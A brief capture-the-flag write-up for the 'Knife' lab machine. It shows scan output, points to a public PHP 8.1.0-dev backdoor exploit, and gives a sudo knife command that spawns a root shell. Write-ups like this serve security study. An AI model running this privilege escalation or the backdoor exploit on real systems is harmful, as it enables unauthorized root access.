🟢knife

Recon & Enum

port scan

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

directory scan

/.html                (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 5815]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]

website

nothing interesting over here , just a static page Although we intercepted in response shows php version

X-Powered-By: PHP/8.1.0-dev

shell as james

we can search exploit for this , after searching i got this exploit :-

GitHub - flast101/php-8.1.0-dev-backdoor-rce: PHP 8.1.0-dev Backdoor System Shell ScriptGitHub

privesc james -> root

sudo -l

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

after searching on GTFObins , i got this :-

sudo knife exec -E 'exec "/bin/sh"'

and i got the shell as root

Previousmagic NextFrolic

Last updated 2 years ago

hashtagRecon & Enum

hashtagport scan

hashtagdirectory scan

hashtagwebsite

hashtagshell as james